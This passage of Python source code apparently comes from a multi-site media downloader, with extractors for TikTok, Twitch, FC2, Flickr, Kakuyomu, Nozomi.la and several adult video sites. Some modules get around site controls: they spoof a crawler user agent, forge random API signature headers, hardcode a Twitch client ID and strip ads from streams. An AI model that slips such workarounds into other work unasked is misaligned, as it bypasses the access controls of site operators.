get_print(cw)('captcha') return r class Downloader_tiktok(Downloader): type = 'tiktok' single = True URLS = ['tiktok.com', 'douyin.com'] display_name = 'TikTok' ACCEPT_COOKIES = [r'(.*\.)?(tiktok|douyin)\.com'] def init(self): cw = self.cw self.session = Session() res = clf2.solve(self.url, self.session, cw) soup = Soup(res['html']) if is_captcha(soup, cw): def f(html): return not is_captcha(Soup(html)) res = clf2.solve(self.url, self.session, cw, show=True, f=f) self.url = self.fix_url(res['url']) #4324 @classmethod def fix_url(cls, url): url = url.split('?')[0].split('#')[0].strip('/') if '://' not in url: url = 'https://www.tiktok.com/@{}'.format(url) return url def read(self): format = compatstr(self.ui_setting.youtubeFormat.currentText()).lower().strip() def parse_video_url(info, item): if 'url' in item: return item['url'] if 'tiktok.com' in self.url.lower(): # TikTok return 'https://www.tiktok.com/@{}/video/{}'.format(info.get('uid', ''), item['id']) #5235 else: # Douyin return 'https://www.douyin.com/video/{}'.format(item['id']) if re.search(PATTERN_VID, self.url): # single video video = Video(self.url, self.session, format, self.cw) video.url() self.urls.append(video.url) self.title = video.title elif 'tiktok.com/tag/' in self.url or 'douyin.com/search/' in self.url: # tag search tag = re.find(r'/(tag|search)/([^/#\?]+)', self.url)[1] tag = unquote(tag) title = '#{}'.format(tag) info = read_channel(self.url, self.session, self.cw, title=title) items = info['items'] videos = [Video(parse_video_url(info, item), self.session, format, self.cw) for item in items] video = self.process_playlist(title, videos) elif 'tiktok.com/@' in self.url or 'douyin.com/user/' in self.url: # channel info = read_channel(self.url, self.session, self.cw) items = info['items'] videos = [Video(parse_video_url(info, item), self.session, format, self.cw) for item in items] title = '{} (tiktok_{})'.format(info['nickname'], info['uid']) video = self.process_playlist(title, videos) else: raise NotImplementedError() class Video: _url = None def __init__(self, url, session, format, cw): self.url = LazyUrl(url, self.get, self) self.session = session self.format = format self.cw = cw @try_n(2) def get(self, url): if self._url: return self._url m = re.search(PATTERN_VID, url) id = m.group('id') ydl = ytdl.YoutubeDL(cw=self.cw) info = ydl.extract_info(url) ext = '.mp4' self.title = info['title'] self.filename = format_filename(self.title, id, ext) self._url = info['url'] return self._url def read_channel(url, session, cw=None, title=None): info = {} info['items'] = [] if 'tiktok.com' in url.lower(): # TikTok soup = downloader.read_soup(url, session=session, user_agent='facebookexternalhit/1.1') info['uid'] = re.find(r'/@([\w\.-]+)', soup.find('meta', {'property': 'og:url'})['content'], err='no uid') nick = soup.find('meta', {'property': 'og:title'})['content'] if nick.endswith(' on TikTok'): nick = nick[:-len(' on TikTok')] info['nickname'] = nick else: # Douyin def f(html, browser=None): soup = Soup(html) if is_captcha(soup): browser.show() return False try: info['uid'] = re.find(r'''uniqueId%22%3A%22(.+?)%22''', html, err='no uid') info['nickname'] = json.loads(re.findall(r'''"name"\s*:\s*(".+?")''', html)[-1]) #5896 return True except: return False clf2.solve(url, session, cw, f=f) options = { 'extract_flat': True, 'playlistend': get_max_range(cw), } ydl = ytdl.YoutubeDL(options, cw=cw) info_ = ydl.extract_info(url) for e in info_['entries']: info['items'].append({'url': e['webpage_url']}) if not info['items']: 
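        # Nothing was collected from either the metadata scrape or ytdl's flat playlist extraction.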
raise Exception('no items') return info File: src/extractor/hanime_downloader.py import downloader from utils import Session, Downloader, try_n, Soup, format_filename, get_print, get_resolution, json import ree as re from io import BytesIO import os from timee import time from m3u8_tools import M3u8_stream from random import randrange class Video: def __init__(self, info, stream): self.info = info self.id = info['id'] self.title = info['name'] self.brand = info['brand'] self.url = stream['url'] self.url_thumb = info['poster_url'] self.thumb = BytesIO() downloader.download(self.url_thumb, buffer=self.thumb) ext = os.path.splitext(self.url.split('?')[0].split('#')[0])[1] if ext.lower() == '.m3u8': ext = '.mp4' self.url = M3u8_stream(self.url, n_thread=4) for i, seg in self.url.urls[-20:]: seg._ignore_err = True #5272 else: size = downloader.get_size(self.url) if size <= 0: raise Exception('Size is 0') self.filename = format_filename('[{}] {}'.format(self.brand, self.title), self.id, ext) def __repr__(self): return f'Video({self.id})' class Downloader_hanime(Downloader): type = 'hanime' URLS = ['hanime.tv/hentai-videos/', 'hanime.tv/videos/'] single = True display_name = 'hanime.tv' ACCEPT_COOKIES = [r'(.*\.)?hanime\.tv'] def init(self): self.session = Session('chrome') def read(self): video = get_video(self.url, self.session, cw=self.cw) self.video = video self.urls.append(video.url) self.filenames[video.url] = video.filename self.setIcon(video.thumb) self.title = '[{}] {}'.format(video.brand, video.title) @try_n(8) def get_video(url, session, cw=None): print_ = get_print(cw) session.headers['X-Directive'] = 'api' html = downloader.read_html(url, session=session) soup = Soup(html) for script in soup.findAll('script'): script = script.text or script.string or '' data = re.find('window.__NUXT__=(.+)', script) if data is not None: data = data.strip() if data.endswith(';'): data = data[:-1] data = json.loads(data) break else: raise Exception('No __NUXT__') info = data['state']['data']['video']['hentai_video'] query = info['slug'] #url_api = 'https://members.hanime.tv/api/v3/videos_manifests/{}?'.format(query) # old url_api = 'https://hanime.tv/rapi/v7/videos_manifests/{}?'.format(query) # new hdr = { 'x-signature': ''.join('{:x}'.format(randrange(16)) for i in range(32)), 'x-signature-version': 'web2', 'x-time': str(int(time())), } r = session.get(url_api, headers=hdr) data = json.loads(r.text) streams = [] for server in data['videos_manifest']['servers']: streams += server['streams'] streams_good = [] for stream in streams: url_video = stream['url'] if not url_video or 'deprecated.' 
in url_video: continue stream['height'] = int(stream['height']) streams_good.append(stream) if not streams_good: raise Exception('No video available') res = get_resolution() def print_stream(stream): print_([stream['extension'], stream['height'], stream['filesize_mbs'], stream['url']]) steams_filtered = [] for stream in streams_good: print_stream(stream) if stream['height'] <= res: #3712 steams_filtered.append(stream) if steams_filtered: stream = sorted(steams_filtered, key=lambda _: _['height'])[-1] else: stream = sorted(streams_good, key=lambda _: _['height'])[0] print_('Final stream:') print_stream(stream) return Video(info, stream) File: src/extractor/kissjav_downloader.py import downloader from utils import urljoin, Downloader, LazyUrl, Session, try_n, format_filename, get_resolution, get_print import ree as re from io import BytesIO import clf2 class Downloader_kissjav(Downloader): type = 'kissjav' URLS = ['kissjav.com', 'kissjav.li', 'mrjav.net'] #4835 single = True display_name = 'KissJAV' ACCEPT_COOKIES = [r'(.*\.)?(kissjav|mrjav)\.(com|li|net)'] def read(self): self.session = Session()#get_session(self.url, cw=self.cw) video = get_video(self.url, self.session, self.cw) self.urls.append(video.url) self.setIcon(video.thumb) self.enableSegment(1024*1024//2) self.title = video.title @try_n(2) def get_video(url, session, cw): print_ = get_print(cw) soup = downloader.read_soup(url, session=session) view = soup.find('div', id='player-container-fluid') fs = [] for source in view.findAll('source'): src = urljoin(url, source.attrs['src']) res = re.find('([0-9]+)p', source.attrs['title']) res = int(res) if res else 0 f = {'res': res, 'src': src} fs.append(f) print_(f) if not fs: raise Exception('No source') #4773 res = max(get_resolution(), min(f['res'] for f in fs)) print_(f'res: {res}') fs = sorted([f for f in fs if f['res'] <= res], key=lambda f: f['res']) f = fs[-1] print_(f'best: {f}') src_best = f['src'] title = soup.find('h1').text.strip() id = soup.find('div', id='video').attrs['data-id'] url_thumb = soup.find('meta', {'property': 'og:image'}).attrs['content'] #src_best = downloader.real_url(src_best) video = Video(src_best, url_thumb, url, title, id, session) return video class Video: def __init__(self, url, url_thumb, referer, title, id, session): self.title = title self.filename = format_filename(title, id, '.mp4') self.url = LazyUrl(referer, lambda x: url, self) self.thumb = BytesIO() self.url_thumb = url_thumb downloader.download(url_thumb, buffer=self.thumb, session=session) @try_n(2) def get_session(url, cw=None): session = Session() clf2.solve(url, session=session, cw=cw) return session File: src/extractor/kakuyomu_downloader.py #coding:utf8 import downloader import utils from utils import Soup, urljoin, Downloader, LazyUrl, try_n, clean_title, get_print, json, File import os from io import BytesIO from translator import tr_ class Page(File): type = 'kakuyomu' format = 'title' def __init__(self, info): info['title_all'] = clean_title('[{:04}] {}'.format(info['p'], info['title'])) d = { 'title': info['title_all'], } info['name'] = utils.format(self.type, d, '.txt') super().__init__(info) def get(self): text = get_text(self) f = BytesIO() f.write(text.encode('utf8')) f.seek(0) return {'url': f} class Downloader_kakuyomu(Downloader): type = 'kakuyomu' URLS = ['kakuyomu.jp'] MAX_CORE = 2 detect_removed = False display_name = 'カクヨム' ACCEPT_COOKIES = [r'(.*\.)?kakuyomu\.jp'] atts = ['info_title', 'info_description'] def read(self): self.info = get_info(self.url, cw=self.cw) 
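# --- Illustrative sketch (not part of this module) ---------------------------
# get_info() below pulls the Next.js `__NEXT_DATA__` payload out of the page and
# walks the embedded Apollo cache for the work title, author and episodes. A
# minimal, self-contained sketch of that first step, using only the standard
# library on a hard-coded HTML string (the sample values are made up; the real
# extractor uses Soup instead of a regex):
import json as _json
import re as _re

_sample_html = (
    '<html><body>'
    '<script id="__NEXT_DATA__" type="application/json">'
    '{"query": {"workId": "123"}, "props": {"pageProps": {}}}'
    '</script></body></html>'
)
_m = _re.search(r'<script id="__NEXT_DATA__"[^>]*>(.*?)</script>', _sample_html, _re.S)
_payload = _json.loads(_m.group(1))
assert _payload['query']['workId'] == '123'
# -----------------------------------------------------------------------------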
self.artist = self.info['artist'] title_dir = clean_title('[{}] {}'.format(self.artist, self.info['title'])) outdir = utils.dir(self.type, title_dir, self.cw) self.urls += self.info['pages'] self.title = title_dir self.info_title = self.info['title'] self.info_description = self.info['description'] def post_processing(self): names = self.cw.names filename = clean_title('[merged] [{}] {}'.format(self.artist, self.info_title), n=-4) + '.txt' filename = os.path.join(self.dir, filename) try: with utils.open(filename, 'wb') as f: f.write(' {}\n\n 作者:{}\n\n\n'.format(self.info_title, self.artist).encode('utf8')) f.write(self.info_description.encode('utf8')) for i, file in enumerate(names): self.cw.pbar.setFormat('[%v/%m] {} [{}/{}]'.format(tr_('병합...'), i, len(names))) with open(file, 'rb') as f_: text = f_.read() f.write(b'\n\n\n\n') f.write(text) finally: self.cw.pbar.setFormat('[%v/%m]') @try_n(4, sleep=30) def get_text(page): html = downloader.read_html(page['referer']) soup = Soup(html) view = soup.find('div', class_='widget-episodeBody') story = view.text.strip() text = '''──────────────────────────────── ◆ {} {} ──────────────────────────────── {}'''.format(page['title_all'], page['date'], story) return text def get_info(url, soup=None, cw=None): print_ = get_print(cw) if soup is None: html = downloader.read_html(url) soup = Soup(html) info = {} rdata = soup.find('script', id='__NEXT_DATA__').string #6620 data = json.loads(rdata) wid = data['query']['workId'] info['title'] = data['props']['pageProps']['__APOLLO_STATE__'][f'Work:{wid}']['title'] aid = data['props']['pageProps']['__APOLLO_STATE__'][f'Work:{wid}']['author']['__ref'] info['artist'] = data['props']['pageProps']['__APOLLO_STATE__'][f'{aid}']['activityName'] catch = data['props']['pageProps']['__APOLLO_STATE__'][f'Work:{wid}'].get('catchphrase') or '' intro = data['props']['pageProps']['__APOLLO_STATE__'][f'Work:{wid}'].get('introduction') or '' desc = ' {}{}'.format(catch, ('\n\n\n'+intro) if intro else '') info['description'] = desc eps = [] for tc in data['props']['pageProps']['__APOLLO_STATE__'][f'Work:{wid}']['tableOfContents']: _ = data['props']['pageProps']['__APOLLO_STATE__'][tc['__ref']].get('episodes') if _: eps += _ else: #6708 eps += data['props']['pageProps']['__APOLLO_STATE__'][tc['__ref']]['episodeUnions'] pages = [] for ep in eps: eid = ep['__ref'].split('Episode:')[1] href = urljoin(url, f'/works/{wid}/episodes/{eid}') subtitle = data['props']['pageProps']['__APOLLO_STATE__'][ep['__ref']]['title'] date = data['props']['pageProps']['__APOLLO_STATE__'][ep['__ref']]['publishedAt'] page = Page({'referer': href, 'title': subtitle, 'date': date, 'p': len(pages)+1}) pages.append(page) info['pages'] = pages return info File: src/extractor/mastodon_downloader.py #coding:utf8 from utils import Downloader, clean_title, Session from mastodon import get_info import ree as re def get_id(url): return re.find('mastodon.social/([^/]+)', url.lower()) class Downloader_mastodon(Downloader): type = 'mastodon' URLS = ['mastodon.social'] ACCEPT_COOKIES = [r'(.*\.)?mastodon\.social'] def init(self): self.session = Session() @classmethod def fix_url(cls, url): id_ = get_id(url) or url return f'https://mastodon.social/{id_}' def read(self): id_ = get_id(self.url) info = get_info('mastodon.social', id_, f'mastodon_{id_}', self.session, self.cw) self.urls += info['files'] self.title = clean_title('{} (mastodon_{})'.format(info['title'], id_)) File: src/extractor/twitch_downloader.py #coding: utf8 import downloader import ytdl from utils 
import Downloader, LazyUrl, try_n, format_filename, get_ext, Session, get_print, get_resolution, get_max_range, print_error, json from io import BytesIO from m3u8_tools import M3u8_stream import ree as re import errors import utils import os class Downloader_twitch(Downloader): type = 'twitch' URLS = ['twitch.tv'] single = True ACCEPT_COOKIES = [r'.*(twitch|ttvnw|jtvnw).*'] def init(self): url = self.url if 'twitch.tv' in url: if not url.startswith('http://') and not url.startswith('https://'): url = 'https://' + url self.url = url else: url = f'https://www.twitch.tv/videos/{url}' self.url = url self.session = Session() @classmethod def fix_url(cls, url): url = url.replace('m.twitch.tv', 'www.twitch.tv') if re.search(r'/(videos|clips)\?filter=', url): return url.strip('/') url = url.split('?')[0].strip('/') filter = cls.get_filter(url) if filter == 'live': url = '/'.join(url.split('/')[:4]) return url @classmethod def get_filter(cls, url): if url.count('/') == 3: if 'www.twitch.tv' in url or '//twitch.tv' in url: filter = 'live' else: filter = None elif url.count('/') == 4: filter = re.find(r'filter=([0-9a-zA-Z_]+)', url) or re.find(r'[0-9a-zA-Z_]+', url.split('/')[-1]) if filter is not None and filter.isdigit(): filter = None else: filter = None if filter in ['about', 'schedule']: filter = 'live' return filter def read(self): if '/directory/' in self.url.lower(): raise errors.Invalid(f'[twitch] Directory is unsupported: {self.url}') filter = self.get_filter(self.url) if filter is None: video = Video(self.url, self.session, self.cw) video.url() self.urls.append(video.url) self.title = video.title elif filter == 'live': video = Video(self.url, self.session, self.cw, live=True) video.url() self.urls.append(video.url) self.title = os.path.splitext(video.filename)[0].replace(':', ':') elif filter == 'clips': info = get_videos(self.url, self.session, cw=self.cw) video = self.process_playlist('[Clip] {}'.format(info['name']), info['videos']) else: raise NotImplementedError(filter) self.artist = video.artist thumb = BytesIO() downloader.download(video.url_thumb, buffer=thumb) #5418 self.setIcon(thumb) if filter == 'live': d = {} d['url'] = self.url d['title'] = self.artist d['thumb'] = thumb.getvalue() utils.update_live(d, self.cw) @try_n(2) def get_videos(url, session, cw=None): print_ = get_print(cw) print_(f'get_videos: {url}') info = {} options = { 'extract_flat': True, 'playlistend': get_max_range(cw), } videos = [] ydl = ytdl.YoutubeDL(options, cw=cw) info = ydl.extract_info(url) for e in info['entries']: video = Video(e['url'], session, cw) video.id = int(e['id']) videos.append(video) if 'name' not in info: info['name'] = ydl.extract_info(e['url'])['creator'] if not videos: raise Exception('no videos') info['videos'] = sorted(videos, key=lambda video: video.id, reverse=True) return info def alter(seg, cw): if 'amazon' in seg.raw.title.lower(): get_print(cw)('strip ads') return [] segs = [] if '-muted' in seg.url: seg_ = seg.copy() seg_.url = seg.url.replace('-muted', '') segs.append(seg_) segs.append(seg) return segs def extract_info(url, cw=None): print_ = get_print(cw) ydl = ytdl.YoutubeDL(cw=cw) try: info = ydl.extract_info(url) except Exception as e: ex = type(ytdl.get_extractor(url))(ydl) _download_info = getattr(ex, '_download_info', None) if _download_info is not None: vod_id = ex._match_id(url) info = _download_info(vod_id) print_(info) if 'HTTPError 403' in str(e): raise errors.LoginRequired() raise return info class Video: _url = None def __init__(self, url, session, cw, live=False): self.url =
LazyUrl(url, self.get, self) self.session = session self.cw = cw self._live = live @try_n(4) def get(self, url): print_ = get_print(self.cw) session = self.session if self._url: return self._url info = extract_info(url, self.cw) self.artist = info.get('creator') or info.get('uploader') #4953, #5031 def print_video(video): #print_(video)# print_('{}[{}] [{}] [{}] {}'.format('LIVE ', video['format_id'], video.get('height'), video.get('tbr'), video['url'])) videos = [video for video in info['formats'] if video.get('height')] videos = sorted(videos, key=lambda video:(video.get('height', 0), video.get('tbr', 0)), reverse=True) for video in videos: print_video(video) for video in videos: if video.get('height', 0) <= get_resolution(): #3723 video_best = video break else: video_best = videos[-1] print_video(video) video = video_best['url'] ext = get_ext(video) id = info['display_id'] if self._live: self.title = info['description'] if utils.SD['twitch']['strip_ads']: video = M3u8_stream(video, n_thread=4, alter=alter, session=session) else: video = utils.LiveStream(video, headers=video_best.get('http_headers', {})) ext = '.mp4' else: self.title = info['title'] if ext.lower() == '.m3u8': video = M3u8_stream(video, n_thread=4, alter=alter, session=session) ext = '.mp4' self.filename = format_filename(self.title, id, ext, artist=self.artist, live=self._live) self.url_thumb = info['thumbnail'] self._url = video return self._url def get_streamer_name(url): session = Session() session.purge('twitch') graphql_url = 'https://gql.twitch.tv/gql' headers = { 'Client-ID': 'kimne78kx3ncx6brgo4mv6wki5h1ko', 'Content-Type': 'application/json', } session.headers.update(headers) id = url.split('/')[3] payload = {'operationName': 'PlaybackAccessToken_Template', 'query': 'query PlaybackAccessToken_Template($login: String!, $isLive: Boolean!, $vodID: ID!, $isVod: Boolean!, $playerType: String!) 
{ streamPlaybackAccessToken(channelName: $login, params: {platform: "web", playerBackend: "mediaplayer", playerType: $playerType}) @include(if: $isLive) { value signature authorization { isForbidden forbiddenReasonCode } __typename } videoPlaybackAccessToken(id: $vodID, params: {platform: "web", playerBackend: "mediaplayer", playerType: $playerType}) @include(if: $isVod) { value signature __typename }}', 'variables': {'isLive': True, 'login': id, 'isVod': False, 'vodID': '', 'playerType': 'site'}} r = session.post(graphql_url, json=payload) r.raise_for_status() data = r.json() value = json.loads(data['data']['streamPlaybackAccessToken']['value']) cid = value['channel_id'] utils.log(data) payload = [{"operationName":"EmotePicker_EmotePicker_UserSubscriptionProducts","variables":{"channelOwnerID":f"{cid}"},"extensions":{"persistedQuery":{"version":1,"sha256Hash":"71b5f829a4576d53b714c01d3176f192cbd0b14973eb1c3d0ee23d5d1b78fd7e"}}}] r = session.post(graphql_url, json=payload) r.raise_for_status() data = r.json() return data[0]['data']['user']['displayName'] class Live_twitch(utils.Live): type = 'twitch' @classmethod def is_live(cls, url): return Downloader.get('twitch').get_filter(url) == 'live' @classmethod def check_live(cls, url, info=None): if info is not None: try: info['title'] = get_streamer_name(url) except Exception as e: utils.log(print_error(e)) ydl = ytdl.YoutubeDL(type='twitch') try: ydl.extract_info(url) return True except Exception as e: print(e) return False File: src/extractor/fc2_downloader.py import downloader import ree as re from utils import urljoin, Downloader, format_filename, Soup, LazyUrl, get_print, Session from m3u8_tools import M3u8_stream from io import BytesIO PATTERN_ID = r'/content/([^/]+)' class Downloader_fc2(Downloader): type = 'fc2' single = True URLS = ['video.fc2.com'] ACCEPT_COOKIES = [r'(.*\.)?fc2\.com'] @classmethod def fix_url(cls, url): if not re.match(r'https?://.+', url, re.I): url = f'https://video.fc2.com/content/{url}' return url @classmethod def key_id(cls, url): return re.find(PATTERN_ID, url) or url def read(self): self.session = Session() self.session.cookies.set('_ac', '1', domain='.video.fc2.com') info = get_info(self.url, self.session, self.cw) video = info['videos'][0] self.urls.append(video.url) f = BytesIO() downloader.download(video.url_thumb, referer=self.url, buffer=f) self.setIcon(f) self.title = info['title'] class Video: def __init__(self, url, url_thumb, referer, title, id_, session): self._url = url self.url = LazyUrl(referer, self.get, self) self.filename = format_filename(title, id_, '.mp4') self.url_thumb = url_thumb self.session = session def get(self, referer): ext = downloader.get_ext(self._url, session=self.session, referer=referer) if ext == '.m3u8': video = M3u8_stream(self._url, referer=referer, session=self.session, n_thread=4) else: video = self._url return video def get_info(url, session, cw=None): print_ = get_print(cw) info = {'videos': []} html = downloader.read_html(url, session=session) soup = Soup(html) info['title'] = soup.find('h2', class_='videoCnt_title').text.strip() id_ = re.find(PATTERN_ID, url, err='no id') print_('id: {}'.format(id_)) token = re.find(r'''window.FC2VideoObject.push\(\[['"]ae['"], *['"](.+?)['"]''', html, err='no token') print_('token: {}'.format(token)) url_api = 'https://video.fc2.com/api/v3/videoplaylist/{}?sh=1&fs=0'.format(id_) hdr = { 'X-FC2-Video-Access-Token': token, } data = downloader.read_json(url_api, url, session=session, headers=hdr) pl = data['playlist'] url_video = 
urljoin(url, pl.get('hq') or pl.get('nq') or pl['sample']) #3784 url_thumb = soup.find('meta', {'property':'og:image'})['content'] video = Video(url_video, url_thumb, url, info['title'], id_, session) info['videos'].append(video) return info File: src/extractor/flickr_downloader.py from utils import Downloader, File, Session, urljoin, get_ext, clean_title, Soup, limits import utils import ree as re import downloader import clf2 from timee import time TIMEOUT = 10 class File_flickr(File): type = 'flickr' format = '[date] id' @limits(1) def get(self): url = self['referer'] soup = downloader.read_soup(url, session=self.session) img = soup.find('meta', {'property': 'og:image'})['content'] date = re.find(r'"dateCreated":{"data":"([0-9]+)"', soup.html, err='no date') ext = get_ext(img) d = { 'date': int(date), 'id': re.find(r'/photos/[^/]+/([0-9]+)', url, err='no id'), } return {'url': img, 'name': utils.format('flickr', d, ext)} class Downloader_flickr(Downloader): type = 'flickr' URLS = ['flickr.com'] MAX_CORE = 4 ACCEPT_COOKIES = [r'(.*\.)?flickr\.com'] def init(self): self.session = Session() @classmethod def fix_url(cls, url): url = url.replace('flickr.com/people/', 'flickr.com/photos/') uid = re.find(r'flickr.com/photos/([^/]+)', url) if uid: url = f'https://www.flickr.com/photos/{uid}' return url def read(self): tab = ''.join(self.url.split('/')[3:4]) if tab == 'photos': uid = self.url.split('/')[4] title = None ids = set() c = 0 ct = None p_max = 1 def f(html, browser=None): nonlocal title, c, ct, p_max soup = Soup(html) browser.runJavaScript('window.scrollTo(0,document.body.scrollHeight);') for a in soup.findAll('a'): href = a.get('href') or '' href = urljoin(self.url, href) p_max = max(p_max, int(re.find(rf'flickr.com/photos/{uid}/page([0-9]+)', href) or 0)) id_ = re.find(rf'/photos/{uid}/([0-9]+)', href) if not id_: continue if id_ in ids: continue ids.add(id_) file = File_flickr({'referer': href}) self.urls.append(file) if ids: uname = soup.h1.text.strip() title = f'{clean_title(uname)} (flickr_{uid})' self.cw.setTitle(f'{title} - {len(ids)}') if c == len(ids): if not ct: ct = time() dt = time() - ct if dt > TIMEOUT: return True else: ct = None c = len(ids) p = 1 while p <= p_max: url = f'https://www.flickr.com/photos/{uid}/page{p}' self.print_(url) clf2.solve(url, session=self.session, f=f) p += 1 self.title = title else: raise NotImplementedError(tab) File: src/extractor/v2ph_downloader.py #coding:utf8 import downloader from utils import get_ext, LazyUrl, Downloader, try_n, clean_title, get_print, print_error, limits import ree as re from translator import tr_ import errors import clf2 def setPage(url, p): url = url.split('?')[0] if p > 1: url += '?page={}'.format(p) return url def getPage(url): p = re.find('page=([0-9]+)', url) return int(p or 1) class Image: def __init__(self, url, referer, p): self._url = url self.url = LazyUrl(referer, self.get, self) ext = get_ext(url) self.filename = '{:04}{}'.format(p, ext) @limits(.25) def get(self, _): return self._url class Downloader_v2ph(Downloader): type = 'v2ph' URLS = ['v2ph.com/album/'] MAX_CORE = 4 MAX_PARALLEL = 1 display_name = 'V2PH' ACCEPT_COOKIES = [r'(.*\.)?v2ph\.com'] def init(self): self.session = clf2.solve(self.url)['session'] @classmethod def fix_url(cls, url): return url.split('?')[0] def read(self): info = get_info(self.url, self.session) for img in get_imgs(self.url, self.session, info['title'], self.cw): self.urls.append(img.url) self.title = clean_title(info['title']) @try_n(2) def get_info(url, session): soup = 
read_soup(url, session) info = {} info['title'] = soup.find('h1').text.strip() return info @try_n(4) @limits(5) def read_soup(url, session): return downloader.read_soup(url, session=session) def get_imgs(url, session, title, cw=None): print_ = get_print(cw) imgs = [] for p in range(1, 1001): url = setPage(url, p) print_(url) try: soup = read_soup(url, session) except Exception as e: if p > 1: print_(print_error(e)) cw.showCookie() #6774 cw.showLogin('https://www.v2ph.com/login', None, None) break else: raise e view = soup.find('div', class_='photos-list') if view is None: if p == 1: raise errors.LoginRequired() else: break # Guest user for img in view.findAll('img'): img = img.attrs['data-src'] img = Image(img, url, len(imgs)) imgs.append(img) pgn = soup.find('ul', class_='pagination') ps = [getPage(a.attrs['href']) for a in pgn.findAll('a')] if pgn else [] if not ps or p >= max(ps): print('max p') break msg = '{} {} ({} / {})'.format(tr_('읽는 중...'), title, p, max(ps)) if cw: cw.setTitle(msg) else: print(msg) return imgs File: src/extractor/nozomi_downloader.py import downloader from urllib.parse import quote from io import BytesIO from utils import Downloader, query_url, get_ext, clean_title, check_alive, lock, get_print, get_max_range, File, Session, limits import errors from translator import tr_ import utils import os class File_nozomi(File): type = 'nozomi' format = 'idpage?' def get(self): infos = [] for p, img in enumerate(read_post(self['id'], self['referer'], self.session, self.cw)): url = img['url'] d = { 'id': img['id'], 'page?': f'_p{p}' if p else '', } filename = utils.format('nozomi', d, get_ext(url)) info = {'url': url, 'name': filename, 'referer': img['referer']} infos.append(info) return infos @limits(.25) def read_post(id, referer, session, cw): print_ = get_print(cw) check_alive(cw) # https://j.nozomi.la/nozomi.js s_id = str(id) url_post = 'https://j.nozomi.la/post/{}/{}/{}.json'.format(s_id[-1], s_id[-3:-1], s_id) try: j = downloader.read_json(url_post, referer, session=session) except Exception as e: print_(f'{id}: {e}') return [] #5989 imgs = [] for url in j['imageurls']: did = url['dataid'] if j.get('is_video'): #5754 cdn = 'v' ext = url['type'] else: cdn = 'g' if j.get('type') == 'gif' else 'w' ext = 'gif' if url.get('type') == 'gif' else 'webp' url = 'https://{}.nozomi.la/{}/{}/{}.{}'.format(cdn, did[-1], did[-3:-1], did, ext) #5340 img = {'id': id, 'url': url, 'referer': f'https://nozomi.la/post/{id}.html'} imgs.append(img) return imgs class Downloader_nozomi(Downloader): type = 'nozomi' URLS = ['nozomi.la'] display_name = 'Nozomi.la' MAX_CORE = 15 ACC_MTIME = True ACCEPT_COOKIES = [r'(.*\.)?nozomi\.la'] def init(self): self.session = Session() @classmethod def fix_url(cls, url): return url.split('#')[0] @property def name(self): qs = query_url(self.url) name = qs['q'][0] if self._popular: name += ' - Popular' return clean_title(name) def read(self): if '/post/' in self.url: raise errors.Invalid(tr_('개별 다운로드는 지원하지 않습니다: {}').format(self.url)) self._popular = 'search-Popular.' 
in self.url self.title = '{} {}'.format(tr_('읽는 중...'), self.name) qs = query_url(self.url) q = qs['q'][0] ids = get_ids_multi(q, self._popular, self.session, self.cw) self.print_(f'ids: {len(ids)}') max_pid = get_max_range(self.cw) def foo(id, p): d = { 'id': id, 'page?': f'_p{p}' if p else '', } filename_guess_base = utils.format('nozomi', d, '.webp') return os.path.join(utils.dir(self.type, self.name, self.cw), filename_guess_base) for id in ids: if os.path.isfile(foo(id, 0)): p = 0 while True: filename_guess = foo(id, p) if not os.path.isfile(filename_guess): break self.urls.append(filename_guess) p += 1 else: file = File_nozomi({'id': id, 'url': f'https://nozomi.la/post/{id}.html', 'referer': self.url}) self.urls.append(file) if len(self.urls) >= max_pid: break self.title = self.name @lock def get_ids(q, popular, session, cw): check_alive(cw) if q is None: if popular: url_api = 'https://j.nozomi.la/index-Popular.nozomi' else: url_api = 'https://j.nozomi.la/index.nozomi' else: q = q.replace('/', '') #5146 if popular: url_api = 'https://j.nozomi.la/nozomi/popular/{}-Popular.nozomi'.format(quote(q)) else: url_api = 'https://j.nozomi.la/nozomi/{}.nozomi'.format(quote(q)) #print_(url_api) f = BytesIO() downloader.download(url_api, 'https://nozomi.la/', session=session, buffer=f) data = f.read() ids = [] for i in range(0, len(data), 4): crop = data[i:i+4] id = crop[0]*16777216 + crop[1]*65536 + crop[2]*256 + crop[3] ids.append(id) return ids def get_ids_multi(q, popular, session, cw=None): print_ = get_print(cw) max_pid = get_max_range(cw) qs = q.split(' ') qs_pos = [q for q in qs if not q.startswith('-')] qs_neg = [q[1:] for q in qs if q.startswith('-')] q = qs_pos[0] if qs_pos else None ids = get_ids(q, popular, session, cw) print_('{}: {}'.format(q, len(ids))) # Positive for q in qs_pos[1:]: ids_ = get_ids(q, popular, session, cw) set_ids_ = set(ids_) ids_old = ids ids = [] for id in ids_old: if id in set_ids_: ids.append(id) print_('{}: {} ({})'.format(q, len(ids_), len(ids))) # Negative for q in qs_neg: ids_ = get_ids(q, popular, session, cw) set_ids_ = set(ids_) ids_old = ids ids = [] for id in ids_old: if id not in set_ids_: ids.append(id) print_('-{}: {} ({})'.format(q, len(ids_), len(ids))) return ids[:max_pid] File: src/extractor/discord_emoji_downloader.py # coding: UTF-8 # title: Discord 서버 커스텀 이모지 다운로드 # author: SaidBySolo """ MIT License Copyright (c) 2020 SaidBySolo Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
